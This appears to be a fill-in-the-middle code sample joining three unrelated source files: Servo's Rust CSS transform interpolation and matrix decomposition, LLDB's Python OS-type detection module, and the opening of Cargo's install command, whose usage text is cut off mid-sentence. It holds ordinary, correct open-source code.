result.push(TransformOperation::Rotate(fx, fy, fz, ia));
} else {
let matrix_f = rotate_to_matrix(fx, fy, fz, fa);
let matrix_t = rotate_to_matrix(tx, ty, tz, ta);
let interpolated = matrix_f.interpolate(&matrix_t, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
}
                (&TransformOperation::Perspective(fd),
                 &TransformOperation::Perspective(td)) => {
                    let mut fd_matrix = ComputedMatrix::identity();
                    let mut td_matrix = ComputedMatrix::identity();
                    fd_matrix.m43 = -1. / fd.to_f32_px();
                    td_matrix.m43 = -1. / td.to_f32_px();
let interpolated = fd_matrix.interpolate(&td_matrix, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
_ => {
// This should be unreachable due to the can_interpolate_list() call.
unreachable!();
}
}
}
} else {
// TODO(gw): Implement matrix decomposition and interpolation
result.extend_from_slice(from_list);
}
TransformList(Some(result))
}
/// https://drafts.csswg.org/css-transforms/#Rotate3dDefined
fn rotate_to_matrix(x: f32, y: f32, z: f32, a: SpecifiedAngle) -> ComputedMatrix {
let half_rad = a.radians() / 2.0;
let sc = (half_rad).sin() * (half_rad).cos();
let sq = (half_rad).sin().powi(2);
ComputedMatrix {
m11: 1.0 - 2.0 * (y * y + z * z) * sq,
m12: 2.0 * (x * y * sq - z * sc),
m13: 2.0 * (x * z * sq + y * sc),
m14: 0.0,
m21: 2.0 * (x * y * sq + z * sc),
m22: 1.0 - 2.0 * (x * x + z * z) * sq,
m23: 2.0 * (y * z * sq - x * sc),
m24: 0.0,
m31: 2.0 * (x * z * sq - y * sc),
m32: 2.0 * (y * z * sq + x * sc),
m33: 1.0 - 2.0 * (x * x + y * y) * sq,
m34: 0.0,
m41: 0.0,
m42: 0.0,
m43: 0.0,
m44: 1.0
}
}
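// Sanity check (illustrative): for a half-turn about the z axis
// (x = 0, y = 0, z = 1, a = pi radians), half_rad = pi/2, so sc = 0 and
// sq = 1, giving m11 = m22 = -1.0, m33 = 1.0 and zero off-diagonal terms --
// the expected 180-degree rotation matrix.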
/// A 2d matrix for interpolation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
#[allow(missing_docs)]
pub struct InnerMatrix2D {
pub m11: CSSFloat, pub m12: CSSFloat,
pub m21: CSSFloat, pub m22: CSSFloat,
}
/// A 2d translation function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Translate2D(f32, f32);
/// A 2d scale function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Scale2D(f32, f32);
/// A decomposed 2d matrix.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct MatrixDecomposed2D {
/// The translation function.
pub translate: Translate2D,
/// The scale function.
pub scale: Scale2D,
/// The rotation angle.
pub angle: f32,
/// The inner matrix.
pub matrix: InnerMatrix2D,
}
impl Interpolate for InnerMatrix2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(InnerMatrix2D {
m11: try!(self.m11.interpolate(&other.m11, progress)),
m12: try!(self.m12.interpolate(&other.m12, progress)),
m21: try!(self.m21.interpolate(&other.m21, progress)),
m22: try!(self.m22.interpolate(&other.m22, progress)),
})
}
}
impl Interpolate for Translate2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Translate2D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress))
))
}
}
impl Interpolate for Scale2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Scale2D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress))
))
}
}
impl Interpolate for MatrixDecomposed2D {
/// https://drafts.csswg.org/css-transforms/#interpolation-of-decomposed-2d-matrix-values
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
// If x-axis of one is flipped, and y-axis of the other,
// convert to an unflipped rotation.
let mut scale = self.scale;
let mut angle = self.angle;
let mut other_angle = other.angle;
if (scale.0 < 0.0 && other.scale.1 < 0.0) || (scale.1 < 0.0 && other.scale.0 < 0.0) {
scale.0 = -scale.0;
scale.1 = -scale.1;
angle += if angle < 0.0 {180.} else {-180.};
}
// Don't rotate the long way around.
if angle == 0.0 {
angle = 360.
}
if other_angle == 0.0 {
other_angle = 360.
}
if (angle - other_angle).abs() > 180. {
if angle > other_angle {
angle -= 360.
}
else{
other_angle -= 360.
}
}
// Interpolate all values.
let translate = try!(self.translate.interpolate(&other.translate, progress));
let scale = try!(scale.interpolate(&other.scale, progress));
let angle = try!(angle.interpolate(&other_angle, progress));
let matrix = try!(self.matrix.interpolate(&other.matrix, progress));
Ok(MatrixDecomposed2D {
translate: translate,
scale: scale,
angle: angle,
matrix: matrix,
})
}
}
impl Interpolate for ComputedMatrix {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
if self.is_3d() || other.is_3d() {
let decomposed_from = decompose_3d_matrix(*self);
let decomposed_to = decompose_3d_matrix(*other);
match (decomposed_from, decomposed_to) {
(Ok(from), Ok(to)) => {
let interpolated = try!(from.interpolate(&to, progress));
Ok(ComputedMatrix::from(interpolated))
},
_ => {
let interpolated = if progress < 0.5 {*self} else {*other};
Ok(interpolated)
}
}
} else {
let decomposed_from = MatrixDecomposed2D::from(*self);
let decomposed_to = MatrixDecomposed2D::from(*other);
let interpolated = try!(decomposed_from.interpolate(&decomposed_to, progress));
Ok(ComputedMatrix::from(interpolated))
}
}
}
impl From<ComputedMatrix> for MatrixDecomposed2D {
/// Decompose a 2D matrix.
/// https://drafts.csswg.org/css-transforms/#decomposing-a-2d-matrix
fn from(matrix: ComputedMatrix) -> MatrixDecomposed2D {
let mut row0x = matrix.m11;
let mut row0y = matrix.m12;
let mut row1x = matrix.m21;
let mut row1y = matrix.m22;
let translate = Translate2D(matrix.m41, matrix.m42);
let mut scale = Scale2D((row0x * row0x + row0y * row0y).sqrt(),
(row1x * row1x + row1y * row1y).sqrt());
// If determinant is negative, one axis was flipped.
let determinant = row0x * row1y - row0y * row1x;
if determinant < 0. {
if row0x < row1y {
scale.0 = -scale.0;
} else {
scale.1 = -scale.1;
}
}
// Renormalize matrix to remove scale.
if scale.0 != 0.0 {
row0x *= 1. / scale.0;
row0y *= 1. / scale.0;
}
if scale.1 != 0.0 {
row1x *= 1. / scale.1;
row1y *= 1. / scale.1;
}
// Compute rotation and renormalize matrix.
let mut angle = row0y.atan2(row0x);
if angle != 0.0 {
let sn = -row0y;
let cs = row0x;
let m11 = row0x;
let m12 = row0y;
let m21 = row1x;
let m22 = row1y;
row0x = cs * m11 + sn * m21;
row0y = cs * m12 + sn * m22;
row1x = -sn * m11 + cs * m21;
row1y = -sn * m12 + cs * m22;
}
let m = InnerMatrix2D {
m11: row0x, m12: row0y,
m21: row1x, m22: row1y,
};
// Convert into degrees because our rotation functions expect it.
angle = angle.to_degrees();
MatrixDecomposed2D {
translate: translate,
scale: scale,
angle: angle,
matrix: m,
}
}
}
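// Worked example (illustrative): a pure scale matrix with m11 = 2.0,
// m22 = 3.0 and every other entry at its identity value decomposes to
// translate (0, 0), scale (2, 3), angle 0 and an identity inner matrix:
// the determinant (6) is positive, so no axis is flipped, and after
// normalization atan2(0, 1) = 0.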
impl From<MatrixDecomposed2D> for ComputedMatrix {
/// Recompose a 2D matrix.
/// https://drafts.csswg.org/css-transforms/#recomposing-to-a-2d-matrix
fn from(decomposed: MatrixDecomposed2D) -> ComputedMatrix {
let mut computed_matrix = ComputedMatrix::identity();
computed_matrix.m11 = decomposed.matrix.m11;
computed_matrix.m12 = decomposed.matrix.m12;
computed_matrix.m21 = decomposed.matrix.m21;
computed_matrix.m22 = decomposed.matrix.m22;
// Translate matrix.
computed_matrix.m41 = decomposed.translate.0;
computed_matrix.m42 = decomposed.translate.1;
// Rotate matrix.
let angle = decomposed.angle.to_radians();
let cos_angle = angle.cos();
let sin_angle = angle.sin();
let mut rotate_matrix = ComputedMatrix::identity();
rotate_matrix.m11 = cos_angle;
rotate_matrix.m12 = sin_angle;
rotate_matrix.m21 = -sin_angle;
rotate_matrix.m22 = cos_angle;
// Multiplication of computed_matrix and rotate_matrix
computed_matrix = multiply(rotate_matrix, computed_matrix);
// Scale matrix.
computed_matrix.m11 *= decomposed.scale.0;
computed_matrix.m12 *= decomposed.scale.0;
computed_matrix.m21 *= decomposed.scale.1;
computed_matrix.m22 *= decomposed.scale.1;
computed_matrix
}
}
/// A 3d translation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Translate3D(f32, f32, f32);
/// A 3d scale function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Scale3D(f32, f32, f32);
/// A 3d skew function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Skew(f32, f32, f32);
/// A 3d perspective transformation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Perspective(f32, f32, f32, f32);
/// A quaternion used to represent a rotation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Quaternion(f32, f32, f32, f32);
/// A decomposed 3d matrix.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct MatrixDecomposed3D {
/// A translation function.
pub translate: Translate3D,
/// A scale function.
pub scale: Scale3D,
/// The skew component of the transformation.
pub skew: Skew,
/// The perspective component of the transformation.
pub perspective: Perspective,
/// The quaternion used to represent the rotation.
pub quaternion: Quaternion,
}
/// Decompose a 3D matrix.
/// https://drafts.csswg.org/css-transforms/#decomposing-a-3d-matrix
fn decompose_3d_matrix(mut matrix: ComputedMatrix) -> Result<MatrixDecomposed3D, ()> {
// Normalize the matrix.
if matrix.m44 == 0.0 {
return Err(());
}
let scaling_factor = matrix.m44;
% for i in range(1, 5):
% for j in range(1, 5):
matrix.m${i}${j} /= scaling_factor;
% endfor
% endfor
// perspective_matrix is used to solve for perspective, but it also provides
// an easy way to test for singularity of the upper 3x3 component.
let mut perspective_matrix = matrix;
% for i in range(1, 4):
perspective_matrix.m${i}4 = 0.0;
% endfor
perspective_matrix.m44 = 1.0;
if perspective_matrix.determinant() == 0.0 {
return Err(());
}
// First, isolate perspective.
let perspective = if matrix.m14 != 0.0 || matrix.m24 != 0.0 || matrix.m34 != 0.0 {
let right_hand_side: [f32; 4] = [
matrix.m14,
matrix.m24,
matrix.m34,
matrix.m44
];
perspective_matrix = perspective_matrix.inverse().unwrap();
// Transpose perspective_matrix
perspective_matrix = ComputedMatrix {
% for i in range(1, 5):
% for j in range(1, 5):
m${i}${j}: perspective_matrix.m${j}${i},
% endfor
% endfor
};
// Multiply right_hand_side with perspective_matrix
let mut tmp: [f32; 4] = [0.0; 4];
% for i in range(1, 5):
tmp[${i - 1}] = (right_hand_side[0] * perspective_matrix.m1${i}) +
(right_hand_side[1] * perspective_matrix.m2${i}) +
(right_hand_side[2] * perspective_matrix.m3${i}) +
(right_hand_side[3] * perspective_matrix.m4${i});
% endfor
Perspective(tmp[0], tmp[1], tmp[2], tmp[3])
} else {
Perspective(0.0, 0.0, 0.0, 1.0)
};
// Next take care of translation
let translate = Translate3D (
matrix.m41,
matrix.m42,
matrix.m43
);
    // Now get scale and shear. 'row' is a 3-element array of 3-component vectors.
let mut row: [[f32; 3]; 3] = [[0.0; 3]; 3];
% for i in range(1, 4):
row[${i - 1}][0] = matrix.m${i}1;
row[${i - 1}][1] = matrix.m${i}2;
row[${i - 1}][2] = matrix.m${i}3;
% endfor
// Compute X scale factor and normalize first row.
let row0len = (row[0][0] * row[0][0] + row[0][1] * row[0][1] + row[0][2] * row[0][2]).sqrt();
let mut scale = Scale3D(row0len, 0.0, 0.0);
row[0] = [row[0][0] / row0len, row[0][1] / row0len, row[0][2] / row0len];
// Compute XY shear factor and make 2nd row orthogonal to 1st.
let mut skew = Skew(dot(row[0], row[1]), 0.0, 0.0);
row[1] = combine(row[1], row[0], 1.0, -skew.0);
// Now, compute Y scale and normalize 2nd row.
    let row1len = (row[1][0] * row[1][0] + row[1][1] * row[1][1] + row[1][2] * row[1][2]).sqrt();
scale.1 = row1len;
row[1] = [row[1][0] / row1len, row[1][1] / row1len, row[1][2] / row1len];
skew.0 /= scale.1;
// Compute XZ and YZ shears, orthogonalize 3rd row
skew.1 = dot(row[0], row[2]);
row[2] = combine(row[2], row[0], 1.0, -skew.1);
skew.2 = dot(row[1], row[2]);
row[2] = combine(row[2], row[1], 1.0, -skew.2);
// Next, get Z scale and normalize 3rd row.
let row2len = (row[2][0] * row[2][0] + row[2][1] * row[2][1] + row[2][2] * row[2][2]).sqrt();
scale.2 = row2len;
row[2] = [row[2][0] / row2len, row[2][1] / row2len, row[2][2] / row2len];
skew.1 /= scale.2;
skew.2 /= scale.2;
// At this point, the matrix (in rows) is orthonormal.
// Check for a coordinate system flip. If the determinant
// is -1, then negate the matrix and the scaling factors.
let pdum3 = cross(row[1], row[2]);
if dot(row[0], pdum3) < 0.0 {
% for i in range(3):
scale.${i} *= -1.0;
row[${i}][0] *= -1.0;
row[${i}][1] *= -1.0;
row[${i}][2] *= -1.0;
% endfor
}
// Now, get the rotations out
let mut quaternion = Quaternion (
0.5 * ((1.0 + row[0][0] - row[1][1] - row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 - row[0][0] + row[1][1] - row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 - row[0][0] - row[1][1] + row[2][2]).max(0.0)).sqrt(),
0.5 * ((1.0 + row[0][0] + row[1][1] + row[2][2]).max(0.0)).sqrt()
);
if row[2][1] > row[1][2] {
quaternion.0 = -quaternion.0
}
if row[0][2] > row[2][0] {
quaternion.1 = -quaternion.1
}
if row[1][0] > row[0][1] {
quaternion.2 = -quaternion.2
}
Ok(MatrixDecomposed3D {
translate: translate,
scale: scale,
skew: skew,
perspective: perspective,
quaternion: quaternion
})
}
// Combine two vectors: returns (ascl * a) + (bscl * b), component-wise.
fn combine(a: [f32; 3], b: [f32; 3], ascl: f32, bscl: f32) -> [f32; 3] {
[
(ascl * a[0]) + (bscl * b[0]),
(ascl * a[1]) + (bscl * b[1]),
(ascl * a[2]) + (bscl * b[2])
]
}
// Dot product.
fn dot(a: [f32; 3], b: [f32; 3]) -> f32 {
a[0] * b[0] + a[1] * b[1] + a[2] * b[2]
}
// Cross product.
fn cross(row1: [f32; 3], row2: [f32; 3]) -> [f32; 3] {
[
row1[1] * row2[2] - row1[2] * row2[1],
row1[2] * row2[0] - row1[0] * row2[2],
row1[0] * row2[1] - row1[1] * row2[0]
]
}
impl Interpolate for Translate3D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Translate3D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Scale3D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Scale3D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Skew {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Skew(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress))
))
}
}
impl Interpolate for Perspective {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Perspective(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress)),
try!(self.2.interpolate(&other.2, progress)),
try!(self.3.interpolate(&other.3, progress))
))
}
}
impl Interpolate for MatrixDecomposed3D {
/// https://drafts.csswg.org/css-transforms/#interpolation-of-decomposed-3d-matrix-values
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let mut interpolated = *self;
// Interpolate translate, scale, skew and perspective components.
interpolated.translate = try!(self.translate.interpolate(&other.translate, progress));
interpolated.scale = try!(self.scale.interpolate(&other.scale, progress));
interpolated.skew = try!(self.skew.interpolate(&other.skew, progress));
interpolated.perspective = try!(self.perspective.interpolate(&other.perspective, progress));
// Interpolate quaternions using spherical linear interpolation (Slerp).
let mut product = self.quaternion.0 * other.quaternion.0 +
self.quaternion.1 * other.quaternion.1 +
self.quaternion.2 * other.quaternion.2 +
self.quaternion.3 * other.quaternion.3;
// Clamp product to -1.0 <= product <= 1.0
product = product.min(1.0);
product = product.max(-1.0);
if product == 1.0 {
return Ok(interpolated);
}
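        // With cos(theta) = product, `w` below is
        // sin(progress * theta) / sin(theta), since
        // sin(theta) = sqrt(1 - product * product); the `a` weight,
        // cos(progress * theta) - product * w, simplifies to
        // sin((1 - progress) * theta) / sin(theta) -- the standard slerp
        // weights.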
let theta = product.acos();
        let w = (progress as f32 * theta).sin() / (1.0 - product * product).sqrt();
let mut a = *self;
let mut b = *other;
% for i in range(4):
a.quaternion.${i} *= (progress as f32 * theta).cos() - product * w;
b.quaternion.${i} *= w;
interpolated.quaternion.${i} = a.quaternion.${i} + b.quaternion.${i};
% endfor
Ok(interpolated)
}
}
impl From<MatrixDecomposed3D> for ComputedMatrix {
/// Recompose a 3D matrix.
/// https://drafts.csswg.org/css-transforms/#recomposing-to-a-3d-matrix
fn from(decomposed: MatrixDecomposed3D) -> ComputedMatrix {
let mut matrix = ComputedMatrix::identity();
// Apply perspective
% for i in range(1, 5):
matrix.m${i}4 = decomposed.perspective.${i - 1};
% endfor
// Apply translation
% for i in range(1, 4):
% for j in range(1, 4):
matrix.m4${i} += decomposed.translate.${j - 1} * matrix.m${j}${i};
% endfor
% endfor
// Apply rotation
let x = decomposed.quaternion.0;
let y = decomposed.quaternion.1;
let z = decomposed.quaternion.2;
let w = decomposed.quaternion.3;
// Construct a composite rotation matrix from the quaternion values
        // rotation_matrix starts out as an identity 4x4 matrix
let mut rotation_matrix = ComputedMatrix::identity();
rotation_matrix.m11 = 1.0 - 2.0 * (y * y + z * z);
rotation_matrix.m12 = 2.0 * (x * y + z * w);
rotation_matrix.m13 = 2.0 * (x * z - y * w);
rotation_matrix.m21 = 2.0 * (x * y - z * w);
rotation_matrix.m22 = 1.0 - 2.0 * (x * x + z * z);
rotation_matrix.m23 = 2.0 * (y * z + x * w);
rotation_matrix.m31 = 2.0 * (x * z + y * w);
rotation_matrix.m32 = 2.0 * (y * z - x * w);
rotation_matrix.m33 = 1.0 - 2.0 * (x * x + y * y);
matrix = multiply(rotation_matrix, matrix);
// Apply skew
let mut temp = ComputedMatrix::identity();
if decomposed.skew.2 != 0.0 {
temp.m32 = decomposed.skew.2;
matrix = multiply(matrix, temp);
}
if decomposed.skew.1 != 0.0 {
temp.m32 = 0.0;
temp.m31 = decomposed.skew.1;
matrix = multiply(matrix, temp);
}
if decomposed.skew.0 != 0.0 {
temp.m31 = 0.0;
temp.m21 = decomposed.skew.0;
matrix = multiply(matrix, temp);
}
// Apply scale
% for i in range(1, 4):
% for j in range(1, 4):
matrix.m${i}${j} *= decomposed.scale.${i - 1};
% endfor
% endfor
matrix
}
}
// Multiplication of two 4x4 matrices.
fn multiply(a: ComputedMatrix, b: ComputedMatrix) -> ComputedMatrix {
let mut a_clone = a;
% for i in range(1, 5):
% for j in range(1, 5):
a_clone.m${i}${j} = (a.m${i}1 * b.m1${j}) +
(a.m${i}2 * b.m2${j}) +
(a.m${i}3 * b.m3${j}) +
(a.m${i}4 * b.m4${j});
% endfor
% endfor
a_clone
}
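// Convention note (illustrative): multiply(a, b) computes
// result.m_ij = sum over k of a.m_ik * b.m_kj, i.e. the standard matrix
// product a * b in this field-naming scheme; the recomposition code above
// relies on that ordering.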
impl ComputedMatrix {
fn is_3d(&self) -> bool {
self.m13 != 0.0 || self.m14 != 0.0 ||
self.m23 != 0.0 || self.m24 != 0.0 ||
self.m31 != 0.0 || self.m32 != 0.0 || self.m33 != 1.0 || self.m34 != 0.0 ||
self.m43 != 0.0 || self.m44 != 1.0
}
fn determinant(&self) -> CSSFloat {
self.m14 * self.m23 * self.m32 * self.m41 -
self.m13 * self.m24 * self.m32 * self.m41 -
self.m14 * self.m22 * self.m33 * self.m41 +
self.m12 * self.m24 * self.m33 * self.m41 +
self.m13 * self.m22 * self.m34 * self.m41 -
self.m12 * self.m23 * self.m34 * self.m41 -
self.m14 * self.m23 * self.m31 * self.m42 +
self.m13 * self.m24 * self.m31 * self.m42 +
self.m14 * self.m21 * self.m33 * self.m42 -
self.m11 * self.m24 * self.m33 * self.m42 -
self.m13 * self.m21 * self.m34 * self.m42 +
self.m11 * self.m23 * self.m34 * self.m42 +
self.m14 * self.m22 * self.m31 * self.m43 -
self.m12 * self.m24 * self.m31 * self.m43 -
self.m14 * self.m21 * self.m32 * self.m43 +
self.m11 * self.m24 * self.m32 * self.m43 +
self.m12 * self.m21 * self.m34 * self.m43 -
self.m11 * self.m22 * self.m34 * self.m43 -
self.m13 * self.m22 * self.m31 * self.m44 +
self.m12 * self.m23 * self.m31 * self.m44 +
self.m13 * self.m21 * self.m32 * self.m44 -
self.m11 * self.m23 * self.m32 * self.m44 -
self.m12 * self.m21 * self.m33 * self.m44 +
self.m11 * self.m22 * self.m33 * self.m44
}
fn inverse(&self) -> Option<ComputedMatrix> {
let mut det = self.determinant();
if det == 0.0 {
return None;
}
det = 1.0 / det;
let x = ComputedMatrix {
m11: det *
(self.m23*self.m34*self.m42 - self.m24*self.m33*self.m42 +
self.m24*self.m32*self.m43 - self.m22*self.m34*self.m43 -
self.m23*self.m32*self.m44 + self.m22*self.m33*self.m44),
m12: det *
(self.m14*self.m33*self.m42 - self.m13*self.m34*self.m42 -
self.m14*self.m32*self.m43 + self.m12*self.m34*self.m43 +
self.m13*self.m32*self.m44 - self.m12*self.m33*self.m44),
m13: det *
(self.m13*self.m24*self.m42 - self.m14*self.m23*self.m42 +
self.m14*self.m22*self.m43 - self.m12*self.m24*self.m43 -
self.m13*self.m22*self.m44 + self.m12*self.m23*self.m44),
m14: det *
(self.m14*self.m23*self.m32 - self.m13*self.m24*self.m32 -
self.m14*self.m22*self.m33 + self.m12*self.m24*self.m33 +
self.m13*self.m22*self.m34 - self.m12*self.m23*self.m34),
m21: det *
(self.m24*self.m33*self.m41 - self.m23*self.m34*self.m41 -
self.m24*self.m31*self.m43 + self.m21*self.m34*self.m43 +
self.m23*self.m31*self.m44 - self.m21*self.m33*self.m44),
m22: det *
(self.m13*self.m34*self.m41 - self.m14*self.m33*self.m41 +
self.m14*self.m31*self.m43 - self.m11*self.m34*self.m43 -
self.m13*self.m31*self.m44 + self.m11*self.m33*self.m44),
m23: det *
(self.m14*self.m23*self.m41 - self.m13*self.m24*self.m41 -
self.m14*self.m21*self.m43 + self.m11*self.m24*self.m43 +
self.m13*self.m21*self.m44 - self.m11*self.m23*self.m44),
m24: det *
(self.m13*self.m24*self.m31 - self.m14*self.m23*self.m31 +
self.m14*self.m21*self.m33 - self.m11*self.m24*self.m33 -
self.m13*self.m21*self.m34 + self.m11*self.m23*self.m34),
m31: det *
(self.m22*self.m34*self.m41 - self.m24*self.m32*self.m41 +
self.m24*self.m31*self.m42 - self.m21*self.m34*self.m42 -
self.m22*self.m31*self.m44 + self.m21*self.m32*self.m44),
m32: det *
(self.m14*self.m32*self.m41 - self.m12*self.m34*self.m41 -
self.m14*self.m31*self.m42 + self.m11*self.m34*self.m42 +
self.m12*self.m31*self.m44 - self.m11*self.m32*self.m44),
m33: det *
(self.m12*self.m24*self.m41 - self.m14*self.m22*self.m41 +
self.m14*self.m21*self.m42 - self.m11*self.m24*self.m42 -
self.m12*self.m21*self.m44 + self.m11*self.m22*self.m44),
m34: det *
(self.m14*self.m22*self.m31 - self.m12*self.m24*self.m31 -
self.m14*self.m21*self.m32 + self.m11*self.m24*self.m32 +
self.m12*self.m21*self.m34 - self.m11*self.m22*self.m34),
m41: det *
(self.m23*self.m32*self.m41 - self.m22*self.m33*self.m41 -
self.m23*self.m31*self.m42 + self.m21*self.m33*self.m42 +
self.m22*self.m31*self.m43 - self.m21*self.m32*self.m43),
m42: det *
(self.m12*self.m33*self.m41 - self.m13*self.m32*self.m41 +
self.m13*self.m31*self.m42 - self.m11*self.m33*self.m42 -
self.m12*self.m31*self.m43 + self.m11*self.m32*self.m43),
m43: det *
(self.m13*self.m22*self.m41 - self.m12*self.m23*self.m41 -
self.m13*self.m21*self.m42 + self.m11*self.m23*self.m42 +
self.m12*self.m21*self.m43 - self.m11*self.m22*self.m43),
m44: det *
(self.m12*self.m23*self.m31 - self.m13*self.m22*self.m31 +
self.m13*self.m21*self.m32 - self.m11*self.m23*self.m32 -
self.m12*self.m21*self.m33 + self.m11*self.m22*self.m33),
};
Some(x)
}
}
/// https://drafts.csswg.org/css-transforms/#interpolation-of-transforms
impl Interpolate for TransformList {
#[inline]
fn interpolate(&self, other: &TransformList, progress: f64) -> Result<Self, ()> {
// http://dev.w3.org/csswg/css-transforms/#interpolation-of-transforms
let result = match (&self.0, &other.0) {
(&Some(ref from_list), &Some(ref to_list)) => {
// Two lists of transforms
interpolate_transform_list(from_list, &to_list, progress)
}
(&Some(ref from_list), &None) => {
// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
let to_list = build_identity_transform_list(from_list);
interpolate_transform_list(from_list, &to_list, progress)
}
(&None, &Some(ref to_list)) => {
// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
let from_list = build_identity_transform_list(to_list);
interpolate_transform_list(&from_list, to_list, progress)
}
_ => {
// http://dev.w3.org/csswg/css-transforms/#none-none-animation
TransformList(None)
}
};
Ok(result)
}
}
% endif<|fim▁end|> | let iz = fz.interpolate(&tz, progress).unwrap();
result.push(TransformOperation::Translate(ix, iy, iz)); |
<|file_name|>utilsOsType.py<|end_file_name|><|fim▁begin|>""" Utility module to determine the OS Python is running on
--------------------------------------------------------------------------
File: utilsOsType.py
Overview: Python module to supply functions and an enumeration to
help determine the platform type, bit size and OS currently
being used.
--------------------------------------------------------------------------
"""
<|fim▁hole|>
# In-house modules:
# Instantiations:
# Enumerations:
#-----------------------------------------------------------------------------
# Details: Class to implement a 'C' style enumeration type.
# Gotchas: None.
# Authors: Illya Rudkin 28/11/2013.
# Changes: None.
#--
if sys.version_info.major >= 3:
from enum import Enum
class EnumOsType(Enum):
        Unknown = 0
        Darwin = 1
        FreeBSD = 2
        Linux = 3
        NetBSD = 4
        OpenBSD = 5
        Windows = 6
        kFreeBSD = 7
else:
class EnumOsType(object):
values = ["Unknown",
"Darwin",
"FreeBSD",
"Linux",
"NetBSD",
"OpenBSD",
"Windows",
"kFreeBSD"]
class __metaclass__(type):
#++----------------------------------------------------------------
# Details: Fn acts as an enumeration.
# Args: vName - (R) Enumeration to match.
# Returns: Int - Matching enumeration/index.
# Throws: None.
#--
def __getattr__(cls, vName):
return cls.values.index(vName)
#++---------------------------------------------------------------------------
# Details: Reverse fast lookup of the values list.
# Args: vI - (R) Index / enumeration.
# Returns: Str - text description matching enumeration.
# Throws: None.
#--
def name_of(cls, vI):
return EnumOsType.values[vI]
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#++---------------------------------------------------------------------------
# Details: Determine what operating system is currently running on.
# Args: None.
# Returns: EnumOsType - The OS type being used ATM.
# Throws: None.
#--
def determine_os_type():
eOSType = EnumOsType.Unknown
strOS = sys.platform
if strOS == "darwin":
eOSType = EnumOsType.Darwin
elif strOS.startswith("freebsd"):
eOSType = EnumOsType.FreeBSD
elif strOS.startswith("linux"):
eOSType = EnumOsType.Linux
elif strOS.startswith("netbsd"):
eOSType = EnumOsType.NetBSD
elif strOS.startswith("openbsd"):
eOSType = EnumOsType.OpenBSD
elif strOS == "win32":
eOSType = EnumOsType.Windows
elif strOS.startswith("gnukfreebsd"):
eOSType = EnumOsType.kFreeBSD
return eOSType<|fim▁end|> | # Python modules:
import sys # Provide system information
# Third party modules: |
<|file_name|>install.rs<|end_file_name|><|fim▁begin|>use std::path::Path;
use cargo::ops;
use cargo::core::{SourceId, GitReference};
use cargo::util::{CliResult, Config, ToUrl, human};
#[derive(RustcDecodable)]
struct Options {
flag_jobs: Option<u32>,
flag_features: Vec<String>,
flag_no_default_features: bool,
flag_debug: bool,
flag_bin: Vec<String>,
flag_example: Vec<String>,
flag_verbose: bool,
flag_quiet: bool,
flag_color: Option<String>,
flag_root: Option<String>,
flag_list: bool,
arg_crate: Option<String>,
flag_vers: Option<String>,
flag_git: Option<String>,
flag_branch: Option<String>,
flag_tag: Option<String>,
flag_rev: Option<String>,
flag_path: Option<String>,
}
pub const USAGE: &'static str = "
Install a Rust binary
Usage:
cargo install [options] [<crate>]
cargo install [options] --list
Specifying what crate to install:
--vers VERS Specify a version to install from crates.io
--git URL Git URL to install the specified crate from
--branch BRANCH Branch to use when installing from git
--tag TAG Tag to use when installing from git
--rev SHA Specific commit to use when installing from git
--path PATH Filesystem path to local crate to install
Build and install options:
-h, --help Print this message<|fim▁hole|> -j N, --jobs N The number of jobs to run in parallel
--features FEATURES Space-separated list of features to activate
--no-default-features Do not build the `default` feature
--debug Build in debug mode instead of release mode
--bin NAME Only install the binary NAME
--example EXAMPLE Install the example EXAMPLE instead of binaries
--root DIR Directory to install packages into
-v, --verbose Use verbose output
-q, --quiet Less output printed to stdout
--color WHEN Coloring: auto, always, never
This command manages Cargo's local set of installed binary crates. Only packages
which have [[bin]] targets can be installed, and all binaries are installed into
the installation root's `bin` folder. The installation root is determined, in
